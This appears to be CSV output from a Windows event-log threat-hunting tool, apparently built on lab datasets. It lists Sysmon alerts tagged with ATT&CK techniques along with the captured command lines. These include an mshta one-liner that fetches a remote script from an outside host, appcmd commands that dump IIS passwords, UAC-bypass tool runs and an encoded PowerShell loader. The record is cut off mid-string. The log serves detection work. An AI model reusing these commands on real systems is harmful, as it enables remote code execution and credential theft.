C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1," 1 5 4 1 0 0x8000000000000000 4126 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-21 15:32:57.276 365ABB72-1A29-5CE4-0000-00107BE42101 2920 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-39CC-5CE3-0000-002096C70000 0xc796 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-1A29-5CE4-0000-001054E32101 1532 C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T1086 ] Powershell with Suspicious Argument,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,Critical,"Found User (LAPTOP-JU4M3I0E\bouss) run Suspicious PowerShell commands that include (powershell,.cmd) in event with Command Line (powershell.exe start-process notepad.exe) and Parent Image :C:\Windows\SysWOW64\cmd.exe , Parent CommandLine ("C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd) in directory : ( C:\Users\bouss\source\repos\blabla\blabla\ )",1," 1 5 4 1 0 0x8000000000000000 2429138 Microsoft-Windows-Sysmon/Operational LAPTOP-JU4M3I0E 2021-01-26 13:21:14.021 00247C92-174A-6010-0000-0010C0B2D92E 18548 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 10.0.18362.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation PowerShell.EXE powershell.exe start-process notepad.exe C:\Users\bouss\source\repos\blabla\blabla\ LAPTOP-JU4M3I0E\bouss 00247C92-5082-600D-0000-0020A246F726 0x26f746a2 5 Medium SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A 00247C92-1749-6010-0000-0010EFAAD92E 23168 C:\Windows\SysWOW64\cmd.exe "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd ",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243527 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.682 747F3D96-9F61-5E75-0000-001059841E00 8076 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1602619902.353945,2020-10-14T00:11:42.353945+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 2196443 Microsoft-Windows-Sysmon/Operational LAPTOP-JU4M3I0E 2020-10-13 20:11:42.277 00247C92-09FE-5F86-0000-0010AD861401 7648 C:\Windows\System32\cmd.exe 10.0.18362.449 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe c:\windows\system32\cmd.exe c:\Windows\System32\ LAPTOP-JU4M3I0E\bouss 00247C92-DE70-5F85-0000-002059F80600 0x6f859 1 Medium SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 00247C92-09FE-5F86-0000-001051841401 1716 C:\Windows\System32\wuauclt.exe wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1," 1 5 4 1 0 0x8000000000000000 4126 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-21 15:32:57.276 365ABB72-1A29-5CE4-0000-00107BE42101 2920 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-39CC-5CE3-0000-002096C70000 0xc796 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-1A29-5CE4-0000-001054E32101 1532 C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920558.5225,2019-05-27T05:29:18.522500+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," 1 5 4 1 0 0x8000000000000000 5928 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:18.472 365ABB72-3D6E-5CEB-0000-0010CC99FF00 344 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,High,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe start-process notepad.exe ),1," 1 5 4 1 0 0x8000000000000000 2429138 Microsoft-Windows-Sysmon/Operational LAPTOP-JU4M3I0E 2021-01-26 13:21:14.021 00247C92-174A-6010-0000-0010C0B2D92E 18548 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 10.0.18362.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation PowerShell.EXE powershell.exe start-process notepad.exe C:\Users\bouss\source\repos\blabla\blabla\ LAPTOP-JU4M3I0E\bouss 00247C92-5082-600D-0000-0020A246F726 0x26f746a2 5 Medium SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A 00247C92-1749-6010-0000-0010EFAAD92E 23168 C:\Windows\SysWOW64\cmd.exe "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd ",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /delete /tn elevator ),1," 1 5 4 1 0 0x8000000000000000 16249 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 00:32:40.164 365ABB72-69A8-5CD7-0000-0010C0982200 3792 C:\Windows\System32\schtasks.exe 6.1.7600.16385 (win7_rtm.090713-1255) Manages scheduled tasks Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\schtasks.exe" /delete /tn elevator c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-5DEC-5CD7-0000-00204A380100 0x1384a 1 High SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 365ABB72-6998-5CD7-0000-00104E422200 2740 C:\Python27\python.exe python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1," 1 5 4 1 0 0x8000000000000000 6175 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:45.383 365ABB72-FE6D-5CEB-0000-0010332A0C00 3876 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-FD85-5CEB-0000-00104C0E0B00 1944 C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1," 1 5 4 1 0 0x8000000000000000 6175 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:45.383 365ABB72-FE6D-5CEB-0000-0010332A0C00 3876 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-FD85-5CEB-0000-00104C0E0B00 1944 C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 5410 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-03 11:23:17.702 747F3D96-6EA5-5D45-0000-00108FD3E100 7844 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-D4E9-5D45-0000-0020E7030000 0x3e7 1 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6EA5-5D45-0000-0010EED0E100 4768 C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564829508.675628,2019-08-03T14:51:48.675628+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe "C:\Program Files\Windows Media Player\osk.exe" ),1," 1 5 4 1 0 0x8000000000000000 5308 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-03 10:51:47.872 747F3D96-6743-5D45-0000-001068D7B500 6456 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation C:\windows\system32\cmd.exe "C:\Program Files\Windows Media Player\osk.exe" C:\Users\IEUser\Desktop\ MSEDGEWIN10\IEUser 747F3D96-56A3-5D45-0000-0020FBD31800 0x18d3fb 1 Medium SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6742-5D45-0000-00104A66B500 6380 C:\Users\IEUser\Desktop\UACME.exe UACME.exe 32 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1602619902.279861,2020-10-14T00:11:42.279861+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 2196442 Microsoft-Windows-Sysmon/Operational LAPTOP-JU4M3I0E 2020-10-13 20:11:42.277 00247C92-09FE-5F86-0000-0010AC861401 6372 C:\Windows\System32\cmd.exe 10.0.18362.449 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe c:\windows\system32\cmd.exe c:\Windows\System32\ LAPTOP-JU4M3I0E\bouss 00247C92-DE70-5F85-0000-002059F80600 0x6f859 1 Medium SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 00247C92-09FE-5F86-0000-001051841401 1716 C:\Windows\System32\wuauclt.exe wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558452777.286254,2019-05-21T19:32:57.286254+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1," 1 5 4 1 0 0x8000000000000000 4125 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-21 15:32:57.276 365ABB72-1A29-5CE4-0000-001054E32101 1532 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-39CC-5CE3-0000-002096C70000 0xc796 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-4F8A-5CE3-0000-0010C5BB4800 3548 C:\Windows\System32\cmd.exe "cmd.exe" /s /k pushd "C:\Users\IEUser\Desktop" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1611667274.296774,2021-01-26T17:21:14.296774+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd ),1," 1 5 4 1 0 0x8000000000000000 2429137 Microsoft-Windows-Sysmon/Operational LAPTOP-JU4M3I0E 2021-01-26 13:21:13.976 00247C92-1749-6010-0000-0010EFAAD92E 23168 C:\Windows\SysWOW64\cmd.exe 10.0.18362.1316 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd C:\Users\bouss\source\repos\blabla\blabla\ LAPTOP-JU4M3I0E\bouss 00247C92-5082-600D-0000-0020A246F726 0x26f746a2 5 Medium SHA1=DE550F262D31FF81730867A7E294795D085F503B,MD5=E567B7F80B21CC8905383BE1073F3707,SHA256=E5CC034E9062E1211FDDE5F85EBF2BD4E4EF63272BA23877C185C94FB503891E,IMPHASH=392B4D61B1D1DADC1F06444DF258188A 00247C92-1749-6010-0000-0010348FD92E 2988 C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false ",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920560.124804,2019-05-27T05:29:20.124804+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:password ),1," 1 5 4 1 0 0x8000000000000000 5979 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:20.084 365ABB72-3D70-5CEB-0000-0010F2DEFF00 2772 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMA